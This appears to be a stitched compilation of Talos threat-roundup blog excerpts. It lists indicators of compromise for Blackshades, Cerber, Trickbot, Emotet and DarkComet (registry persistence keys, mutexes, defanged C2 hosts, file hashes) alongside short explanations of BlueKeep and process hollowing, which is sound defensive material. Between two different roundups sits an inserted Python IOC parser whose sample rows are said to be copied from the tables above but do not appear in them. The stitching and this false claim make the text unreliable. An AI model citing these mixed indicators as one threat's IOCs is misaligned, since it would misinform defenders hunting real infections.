Umbrella\n\n[](<https://1.bp.blogspot.com/-Jw3Mrmiw4ys/XYTyI8tjTjI/AAAAAAAACqw/XBNHXHTUkUkqeRpe1b6bVdv0CIcYMESkACLcBGAsYHQ/s1600/384583ac629ffbcb7a55da44910dd23cd380ce788bfae201c7ede3189959619f_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Blackshades-7168564-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: DoNotAllowExceptions ` | 67 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\INSTALL ` | 67 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 67 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS ` | 67 
\n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST ` | 67 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\SRVID ` | 67 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\SRVID\\ID ` | 67 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\INSTALL\\DATE ` | 67 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: Microsoft/HKCU ` | 67 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft/HKCU ` | 67 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft/HKCU ` | 67 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{CFBEEEEF-8ABF-1A7E-7BED-B0ECEE1DB9AE} \nValue Name: StubPath ` | 67 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{CFBEEEEF-8ABF-1A7E-7BED-B0ECEE1DB9AE} \nValue Name: StubPath ` | 67 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\SRVID\\ID \nValue Name: 5FHDOAPLOK ` | 67 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST \nValue Name: C:\\Users\\Administrator\\AppData\\Roaming\\Adobe.exe ` | 67 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\INSTALL\\DATE \nValue Name: 5FHDOAPLOK ` | 67 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{CFBEEEEF-8ABF-1A7E-7BED-B0ECEE1DB9AE} ` | 66 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{CFBEEEEF-8ABF-1A7E-7BED-B0ECEE1DB9AE} ` | 65 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS \nValue Name: StubPath ` | 3 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS \nValue Name: StubPath ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS ` | 2 
\n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST \nValue Name: C:\\TEMP\\1a461072aa3e19bc429aa83c49ea31c7722213865cf50a6937b62776a54d8a7b.exe ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST \nValue Name: C:\\TEMP\\0cf04b4b65e7726e9d7d54f88299c4f1bbcad8aed4b586477c1bd7a48d21f318.exe ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST \nValue Name: C:\\TEMP\\1c5fa3c699edc2528a14eb7763db3064fdf8ea90e6d35c5bba8f82f786d995d5.exe ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST \nValue Name: C:\\TEMP\\3954af7bdbe570ff5c6fc1b7776b387a8b3a3d3bb57b0e187a9f4829b51c51cd.exe ` | 1 \nMutexes | Occurrences \n---|--- \n`5FHDOAPLOK` | 67 \n`\\BaseNamedObjects\\5FHDOAPLOK_pers` | 35 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`212[.]117[.]50[.]228` | 67 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`c2upfront[.]no-ip[.]info` | 67 \n`3c2upfront[.]no-ip[.]info` | 67 \n`2c2upfront[.]no-ip[.]info` | 67 \n`1c2upfront[.]no-ip[.]info` | 67 \n`5c2upfront[.]no-ip[.]info` | 36 \n`7c2upfront[.]no-ip[.]info` | 36 \n`4c2upfront[.]no-ip[.]info` | 36 \n`6c2upfront[.]no-ip[.]info` | 36 \nFiles and or directories created | Occurrences \n---|--- \n`\\Autorun.ini` | 67 \n`E:\\Autorun.ini` | 67 \n`%APPDATA%\\Adobe.exe` | 67 \n`%TEMP%\\vbc.exe` | 67 \n`%APPDATA%\\Player` | 67 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1568.3292588968` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1568.3299479095` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1184.3299487707` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1568.3299490359` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.948.3299488440` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1704.3299497847` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1704.3299497597` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1184.3299507550` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1704.3299506988` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1704.3299506754` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1568.3299515631` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1976.3299515428` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1568.3299525552` | 1 \n`%APPDATA%\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.744.3299525693` | 1 \n`%APPDATA%\\Microsoft\\CLR 
Security Config\\v2.0.50727.312\\security.config.cch.1704.3299535739` | 1 \n \n#### File Hashes\n\n` 0061fdd7beb58e2d98dd6425c4467fabf84ee3261deed1ee41b3f09db77a3003 0103e022c0a56da31a998dab5f276be4bfa77e4b45e19d7e274e3ebfc6011794 020b795dc30a29af90cdf3d90213c74a9c1b18842077f48dc1cc824eefe52938 0435e4e9698ecdb041f392ee1e46204c64fa79151b028b9b3a938914a6348f7a 0444890807a5e1d7118896a2de574dd6ed48a0739ce371530ee15181336fe8ac 0581cf5e05f6f3a2148a8182cc6c753397d86eca85515c746a039a043c0156d3 0685f82e2301864e164b8ef4fb8e1f8a01540b3a87e5ca2b632be9b080446b9b 0835583f69abb28340d430ecc408e423c424a24a72a3a58e94a674e8a6880359 08c924b472ee439d357a811a209dac18bd337f5525d44c4a988158b51fb09feb 09898e7c85ce10d9f9e1d02c839b7b1b2c1a95826857854728b59548d0ea12f9 09a2f347ea8ca01153a1f53f668efcea8a85d98789abe0f4aebbbe83c72aed8c 09d34805c6ef60df465377aa7303c3edd19616aa3feba7051d8142f7020fc475 09d87c515a293798b1422625098e5a150c95e9a77e9b4f0207a9d3403fba1978 0a15b2293f794209b5190b12606d59fad342aa183d6a88aa841a70959cd5baf6 0bf4cdc4b180c5c4ceca11cb86be76a19a125ef097b94775a7f7c6b93d0d422f 0bf65a3c05256cb7fa901cfba4382f43032768c664dfab225ef504eda8b2667e 0c09b71359ae1c7358707eda957ae9e821d25e9c54ee9fba0d98a6cf22dcc77d 0c0e8ae82bff3013c7078798f6a9385262f42b27cdf6b89fe86e99aaaf49bd78 0c16e1bc2eece1ba2c3f590f7ea6a3cd32ae0cea789c6a2a066e85659b969107 0cb8b3dec2d52544e2adaf0e8be5765defaf8196fa93066d05f2e9db3ba0df5a 0cf04b4b65e7726e9d7d54f88299c4f1bbcad8aed4b586477c1bd7a48d21f318 0df2f3957a2a7793193ebcac0bd50db52c87f1062d41cb223dd621bbbe91362b 0f7d9402bc26786b576b5fdb6b60904f509bc643edd70ef3278652b7a716591d 0fbd9df4815f16405436ac36d5fe99ac0ae847cf3c0588534cd07d58bb918729 0fbe434942613ae5c6ea47d8abe73c86e898c6af97d89e802bb3ba5e5efc6647 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### 
Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-vYwKemIIgUY/XYTyZtMCW2I/AAAAAAAACq8/LkVtFOW2GKYByPxQ1PoF3flkL0PdaFIaACLcBGAsYHQ/s1600/0a15b2293f794209b5190b12606d59fad342aa183d6a88aa841a70959cd5baf6_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-jaUENMbSBJ4/XYTyewazSYI/AAAAAAAACrA/LfeSt82_ehEc54Eu-pH9_zJc2pT7U2KkQCLcBGAsYHQ/s1600/e10c0c27a812ee6dc5a28e575999eddbe7d120110cb8694a92de7c56372e8b1a_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Ransomware.Cerber-7168312-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER ` | 116 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER \nValue Name: PendingFileRenameOperations ` | 116 \nMutexes | Occurrences \n---|--- \n`shell.{381828AA-8B28-3374-1B67-35680555C5EF}` | 116 \n`\\BaseNamedObjects\\shell.{CA0E5370-75D1-0D8C-179E-782353EA1E4D}` | 16 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`178[.]33[.]163[.]254` | 116 \n`178[.]33[.]162[.]254` | 116 \n`178[.]33[.]160[.]254` | 116 \n`178[.]33[.]161[.]254` | 116 \n`178[.]33[.]160[.]224` | 116 \n`178[.]33[.]160[.]240` | 116 \n`178[.]33[.]162[.]192` | 116 \n`178[.]33[.]158[.]0` | 116 \n`178[.]33[.]159[.]0` | 116 \n`178[.]33[.]160[.]0` | 116 \n`178[.]33[.]160[.]128` | 116 \n`178[.]33[.]160[.]192` | 116 \n`178[.]33[.]160[.]248` | 116 \n`178[.]33[.]160[.]252` | 116 \n`178[.]33[.]161[.]0` | 116 \n`178[.]33[.]161[.]128` | 116 \n`178[.]33[.]161[.]192` | 116 \n`178[.]33[.]161[.]224` | 116 \n`178[.]33[.]161[.]240` | 116 \n`178[.]33[.]161[.]248` | 116 \n`178[.]33[.]161[.]252` | 116 \n`178[.]33[.]162[.]0` | 116 \n`178[.]33[.]162[.]128` | 116 \n`178[.]33[.]162[.]224` | 116 \n`178[.]33[.]162[.]240` | 116 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`api[.]blockcypher[.]com` | 116 \n`bitaps[.]com` | 79 \n`chain[.]so` | 79 \n`BTC[.]BLOCKR[.]IO` | 79 \n`hjhqmbxyinislkkt[.]1j9r76[.]top` | 37 \n`bc-prod-web-lb-430045627[.]us-east-1[.]elb[.]amazonaws[.]com` | 16 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\d19ab989` | 116 \n`%TEMP%\\d19ab989\\4710.tmp` | 116 \n`%TEMP%\\d19ab989\\a35f.tmp` | 116 \n`%TEMP%\\tmp<random, matching [A-F0-9]{1,4}>.tmp` | 116 \n`%TEMP%\\tmp<random, matching [A-F0-9]{1,4}>.bmp` | 116 \n`<dir>\\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.txt` | 116 \n`<dir>\\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.hta` | 116 \n`<dir>\\<random, matching [A-Z0-9\\-]{10}.[A-F0-9]{4}> (copy)` | 16 \n \n#### File Hashes\n\n` 0829786ae40c18d826631865dbd36bc72a5bf83855657316fa7b08221ff0f5cc 0e53d248a1e595deacef928a940792265e8f9e6e19aeedd6f15e9d3e77151ca3 0f1c4d1e75c4299391acc42ee6aeb7c37f662f49ddded5cda67b65e77c994590 116624dbb1103e20eb32786253daa919157862965ecee4a681ea6618b745297a 142a504ded2285194cc6d8a0d22ed667bb7e6755482b5a3781d21cff28a49f0c 166a7b7eb006ea685202b6fb866405290a8d881b1f17d8a713a8fba6019edf3a 1a21029006cd625a8eadf49354e1717d43d657eb185e905992a0b973813fe860 1ab97328ebfdaef12899218b558c1f0ec30495262794d0f6b4f4546aaa5e7e85 1d6782e87dbc95c0639bc44cd05bb172be993af6ba6cd5365f22f3e350a9f504 1ef0774c485c4921846551f9b2238804925ddb85fe9383202f94d313f8775528 220748f24923783182a2120dcd5a24799e799d13678ad58a117b064fe9f32d49 2424a1e17d890329fcb2926c40584a7f335cdcb6870f05eff82e2282fae8a3b4 24578d9dfad55c280b363ee5a37f71a1aa2f5cd1388dcc67097caf03ec973782 25e96af9b71863c16e25f18ef627347aab568f190fc71956fa63553f2b2f65a2 274fbe5faac90ea5ffef8e7b4b9da60642f040194c28dce7de4f9c30b92a7b07 2df15738f5c6d25d23d54d5d74d8ade3eea927152c3cad6307de580397d8b56f 301e0d38d0bac986fe185ab4e420a623bbbbf9103d767950a3dd678111354a8b 37b913abb385ae596b98a0366e4b33fac6e5dc6423bff07375e210774dd6d1ca 
382b8aac516f52bcba3ca0dadae42e550e54bd18fee696d732aa59687c388992 38d4098a18344443ad15805810ba895ceefaf05be83f8ac2f53ea2f69ae7745d 3a523bb773df8f955d0ca81ee411b044692d8c24793cdaba348c2505fddcba09 3cc7d8e616d84ec21af5a3c60348f101a53c0a09257d0fdb4d7d15a4268e6330 3ff2ab9bdbfcc01eb114bf8cfa9ebb6b222b0572eddefb7b09b31e78a99bcdec 412f050b6b171f08875aa4ee5e54a0ec5b263cef01e27debc47324342f6ae188 42bff53fe89ff3b4bc908bfb53fbcb6dda006fed7d6cfb9ab04ce84dbd62f9c2 `

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
Amp |  
Cloudlock | N/A
Cws |  
Email Security |  
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |  
Umbrella | N/A
Wsa | N/A

#### Screenshots of Detection

#### AMP

[AMP detection screenshot](<https://1.bp.blogspot.com/-JJKPEj09VZk/XYTywSpjQQI/AAAAAAAACrM/monRQwjg-j82-dg4GKOhbT8_d1QJ3rGAACLcBGAsYHQ/s1600/24578d9dfad55c280b363ee5a37f71a1aa2f5cd1388dcc67097caf03ec973782_amp.png>)

#### ThreatGrid

[ThreatGrid detection screenshot](<https://1.bp.blogspot.com/-V4TFbOwpb10/XYTy3IDdlCI/AAAAAAAACrQ/c2v2jBu4zhUdt9lXqqTDNhRiDWWSfFnggCLcBGAsYHQ/s1600/a56bcb5d4a60013575d6f99645819a9507bda433e4a1d4c4c520f8ddfe260018_tg.png>)

#### Malware

[Malware screenshot](<https://1.bp.blogspot.com/-DHAaBGP7fS8/XYTy8L_fshI/AAAAAAAACrU/4l9tQuJGgiYfp57e9pFiDTR-_NbAECElQCLcBGAsYHQ/s1600/24578d9dfad55c280b363ee5a37f71a1aa2f5cd1388dcc67097caf03ec973782_malware.png>)

* * *

## Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware techniques with its exploit prevention engine, which defends endpoints against the in-memory attacks commonly used by obfuscated malware and by exploits. These techniques are designed to bypass typical file-scanning anti-virus software, but are blocked by AMP's exploit prevention, which also protects against exploitation of zero-day vulnerabilities. The detections below are listed with the number of times each fired during the period.

**CVE-2019-0708 detected** (11771)

An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a use-after-free memory corruption in the Windows Remote Desktop Services kernel driver that can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Because it is reachable before authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.

**Process hollowing detected** (2431)

Process hollowing is a technique used by some malware to avoid static analysis. The loader unpacks its obfuscated or encrypted payload in memory, starts a legitimate child process in a suspended state, unmaps (hollows out) that process's original image, writes the unpacked payload in its place and then resumes the main thread, so the payload runs under the legitimate process's name and path.

**Excessively long PowerShell command detected** (2353)

A PowerShell command with a very long command-line argument, which may indicate an obfuscated or encoded script, has been detected. PowerShell is an extensible Windows scripting language present by default on all supported versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.

**Madshi injection detected** (1796)

Madshi is a code injection framework that uses process injection to start a new thread if other methods of starting a thread within a process fail. This framework is used by a number of security solutions, so hits are not malicious by themselves; it is also possible for malware to use the same technique.

**Kovter injection detected** (1465)

A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. It is file-less: the malicious payload is stored in the Windows registry and injected directly into memory using PowerShell. It can detect the use of monitoring software such as Wireshark and sandboxes and report this to its C2. It spreads through malicious advertising and spam campaigns.

**Trickbot malware detected** (688)

Trickbot is a banking Trojan that appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected that some of the individuals responsible for Dyre are now behind Trickbot. Trickbot has evolved rapidly in the months since it appeared, although it still lacks some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering and email searching.

**Gamarue malware detected** (170)

Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.

**Installcore adware detected** (95)

InstallCore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that displays advertising in the form of pop-ups or by injecting into browsers and adding or altering advertisements on web pages. Adware is known to sometimes download and install malware.

**Dealply adware detected** (46)

DealPly is adware that claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements into web pages. Adware has also been known to download and install malware.

**Fusion adware detected** (44)

Fusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of pop-ups or by injecting into browsers and altering advertisements on web pages. Adware is known to sometimes download and install malware.
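The IOC tables in this roundup are not directly usable as hunt input: IPs and domains are defanged with `[.]`, the same mutex appears both bare and with a `\BaseNamedObjects\` prefix, and the file rows use `%VAR%`, `<dir>` and `<random, matching RX>` placeholders. The following Python is an added example, not code from Talos or from this post. It parses tables in the roundup's own markdown layout, refangs the network indicators, normalizes mutex names, and compiles each file pattern into a regex that can be run against paths from an endpoint file inventory. `SAMPLE` is a constructed excerpt of rows copied from the tables above, and the `ENV_DIRS` expansions are an assumption about default Windows locations to adjust for your image; all function names are my own.

```python
"""Parse defanged Talos roundup IOC tables into hunt input (added example)."""
import re
from collections import defaultdict

# Constructed excerpt: rows copied from the tables above (number = Occurrences).
SAMPLE = r"""
Mutexes | Occurrences
---|---
`XTREMEUPDATE` | 15
`\BaseNamedObjects\SHuJ5a0JNEXIT` | 5
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`192[.]169[.]69[.]25` | 11
`186[.]80[.]214[.]75` | 1
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`lili3030[.]duckdns[.]org` | 6
Files and or directories created | Occurrences
---|---
`%TEMP%\iJune22.exe` | 15
`%SystemRoot%\SysWOW64\<random, matching '[a-zA-Z0-9]{4,19}'>.exe` | 18
`%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp` | 116
`<dir>\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.txt` | 116
"""

HEADER_RE = re.compile(r"^(?P<name>[^|`]+?)\s*\|\s*Occurrences\s*$")
ROW_RE = re.compile(r"^`(?P<value>.*)`\s*\|\s*(?P<count>\d+)\s*$")
RANDOM_RE = re.compile(r"<random, matching '?(?P<rx>[^'>]+)'?>")

# Assumed default expansions (regexes over the real on-disk path); adjust per image.
ENV_DIRS = {
    "%TEMP%": r"C:\\Users\\[^\\]+\\AppData\\Local\\Temp",
    "%APPDATA%": r"C:\\Users\\[^\\]+\\AppData\\Roaming",
    "%SystemRoot%": r"C:\\Windows",
    "%System32%": r"C:\\Windows\\System32",
}

def parse_ioc_tables(text):
    """Return {section: [(value, occurrences), ...]}; the caveat sentence is dropped."""
    tables, section = defaultdict(list), None
    for line in text.splitlines():
        line = line.strip()
        header, row = HEADER_RE.match(line), ROW_RE.match(line)
        if header:
            section = header.group("name").split(".")[0].strip()
        elif row and section:
            tables[section].append((row.group("value"), int(row.group("count"))))
    return dict(tables)

def refang(indicator):
    """Undo the '[.]' defanging used for IPs and domains."""
    return indicator.replace("[.]", ".")

def normalize_mutex(name):
    """Strip the object-manager directory so X and \\BaseNamedObjects\\X compare equal."""
    prefix = "\\BaseNamedObjects\\"
    return name[len(prefix):] if name.startswith(prefix) else name

def _literal(text):
    """Regex for a literal path fragment, expanding <dir> and %VAR% placeholders."""
    out = []
    for piece in re.split(r"(<dir>|%[A-Za-z0-9]+%)", text):
        if piece == "<dir>":
            out.append(r"[A-Z]:(?:\\[^\\]+)*")  # any directory, no trailing backslash
        elif piece in ENV_DIRS:
            out.append(ENV_DIRS[piece])
        else:
            out.append(re.escape(piece))
    return "".join(out)

def path_pattern_to_regex(pattern):
    """Compile a file row into a full-path regex; '<random, matching RX>' keeps RX live."""
    parts, pos = [], 0
    for m in RANDOM_RE.finditer(pattern):
        parts.append(_literal(pattern[pos:m.start()]))
        parts.append("(?:" + m.group("rx") + ")")
        pos = m.end()
    parts.append(_literal(pattern[pos:]))
    return re.compile("^" + "".join(parts) + "$", re.IGNORECASE)  # NTFS paths are case-insensitive

def hunt_set(tables, min_occurrences=1):
    """Network IOCs and mutexes seen in at least min_occurrences sandboxed samples."""
    kinds = {"IP Addresses": ("ip", refang),
             "Domain Names": ("domain", lambda v: refang(v).lower()),
             "Mutexes": ("mutex", normalize_mutex)}
    out = {"ip": set(), "domain": set(), "mutex": set()}
    for section, rows in tables.items():
        for prefix, (kind, normalize) in kinds.items():
            if section.startswith(prefix):
                out[kind].update(normalize(v) for v, n in rows if n >= min_occurrences)
    return out

def match_file_artifacts(tables, observed_paths):
    """Map each observed full path to the table pattern it matches, if any."""
    compiled = [(p, path_pattern_to_regex(p))
                for p, _ in tables.get("Files and or directories created", [])]
    return {path: pat for path in observed_paths for pat, rx in compiled if rx.match(path)}
```

Keep the page's own caveat in mind when using the output: a hit on a single indicator is a lead, not a verdict, and the tables deliberately include benign infrastructure (for example the public blockchain explorer APIs in the Cerber domain list). `min_occurrences` lets you restrict the hunt set to indicators seen across most samples in a cluster, and the compiled file regexes are the part worth keeping, since a `<random, matching ...>` row cannot be matched by string equality at all.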
Source: Talos blog, "Threat Roundup for September 13 to September 20", published 2019-09-20 (references CVE-2019-0708). Original post: http://feedproxy.google.com/~r/feedburner/Talos/~3/3J4kmzlC65c/threat-roundup-0913-0920.html

* * *

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 25 and Nov. 1. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5dbc4d7341857.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post.
As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
---|---|---
Win.Malware.Trickbot-7367071-1 | Malware | Trickbot is a banking trojan targeting sensitive information for select financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB Scripts.
Win.Dropper.Emotet-7365661-0 | Dropper | Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails. It recently resurfaced after going quiet over the summer of 2019.
Win.Trojan.DarkComet-7365618-1 | Trojan | DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system.
Win.Packed.Zbot-7364099-0 | Packed | Zbot, also known as Zeus, is a trojan that steals information such as banking credentials using methods like key-logging and form-grabbing.
Win.Malware.njRAT-7363922-1 | Malware | njRAT, also known as Bladabindi, is a RAT that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. njRAT was developed by the Sparclyheason group. Some of the largest attacks using this malware date back to 2014.
Win.Trojan.Socks-7363151-0 | Trojan | Socks is a generic worm that spreads itself via autorun.inf files and downloads follow-on malware to infected systems.
Win.Malware.Lokibot-7363866-1 | Malware | Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from a number of popular applications. It is commonly pushed via malicious documents delivered via spam emails.
Win.Packed.Zeroaccess-7358361-0 | Packed | ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine, and serves as a platform for conducting click-fraud campaigns.
Win.Ransomware.Shade-7357624-1 | Ransomware | Shade, also known as Troldesh, is a ransomware family typically spread via malicious email attachments.

* * *

## Threat Breakdown

### Win.Malware.Trickbot-7367071-1

#### Indicators of Compromise

Mutexes | Occurrences
---|---
`Global\316D1C7871E10` | 31

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`23[.]94[.]233[.]210` | 15
`192[.]3[.]104[.]46` | 11
`192[.]3[.]247[.]11` | 3
`172[.]82[.]152[.]126` | 2

#### File Hashes

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | 
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | N/A
WSA | 

#### Screenshots of Detection

[AMP detection screenshot]

* * *

### Win.Dropper.Emotet-7365661-0

#### Indicators of Compromise

Mutexes | Occurrences
---|---
`Global\I98B68E3C` | 168
`Global\M98B68E3C` | 168
`Global\<random guid>` | 3

*See JSON for more IOCs

#### File Hashes

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | 
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | 
WSA | 

#### Screenshots of Detection

[AMP detection screenshot]

[Umbrella detection screenshot]

* * *

### Win.Trojan.DarkComet-7365618-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\DC3_FEXEC` | 25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` Value Name: `java` | 25

Mutexes | Occurrences
---|---
`DC_MUTEX-6ZFK11A` | 25

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`mrsnickers03[.]no-ip[.]biz` | 25

*See JSON for more IOCs

#### File Hashes

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | N/A
WSA | N/A

#### Screenshots of Detection

[AMP detection screenshot]

* * *

### Win.Packed.Zbot-7364099-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
